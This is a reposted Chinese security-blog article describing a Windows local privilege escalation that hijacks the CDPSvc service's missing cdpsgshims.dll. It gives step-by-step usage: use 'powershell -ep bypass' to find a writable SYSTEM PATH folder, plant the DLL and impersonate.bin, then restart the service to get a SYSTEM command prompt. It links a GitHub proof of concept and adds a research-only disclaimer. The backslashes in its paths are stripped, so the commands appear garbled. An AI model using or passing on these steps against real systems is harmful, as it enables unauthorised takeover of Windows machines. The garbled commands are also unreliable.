通过CdpSvc服务提升Windows本地权限

admin
admin
admin
140803
文章
117
评论
2025年2月15日09:24:30评论7 views字数 643阅读2分8秒阅读模式
连接设备平台服务(或 CDPSvc)是一种服务。
它运行NT AUTHORITYLOCAL SERVICE并尝试在启动时通过调用加载缺少的cdpsgshims.dllLoadLibrary() DLL ,而不指定其绝对路径。因此,它可以劫持 Dll Search Order 流文件夹中的 dll,NT AUTHORITYLOCAL SERVICE如果我们劫持 SYSTEM PATH 可写位置的 dll,例如C:python27. 然后,与PrintSpoofer技术结合使用即可获得NT AUTHORITYSYSTEM访问权限。

用法:

  1. 使用 acltest.ps1 查找 Writable SYSTEM PATH(例如 C:python27)

    C:CdpSvcLPE> powershell -ep bypass ". .acltest.ps1"

  2. cdpsgshims.dll 复制到 C:python27

  3. 制作 C:temp 文件夹并将 impersonate.bin 复制到 C:temp

    C:CdpSvcLPE> mkdir C:tempC:CdpSvcLPE> copy impersonate.bin C:temp

  4. 重新启动(或以管理员身份停止/启动 CDPSvc)

  5. cmd 将提示nt authoritysystem.

通过CdpSvc服务提升Windows本地权限

注意:当你得到系统 cmd 提示时,停止 cdpsvc 服务并删除 dll 文件和 bin 文件。

https://github.com/sailay1996/CdpSvcLPE

原文始发于微信公众号(Khan安全攻防实验室):通过CdpSvc服务提升Windows本地权限

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月15日09:24:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通过CdpSvc服务提升Windows本地权限https://cn-sec.com/archives/1051634.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息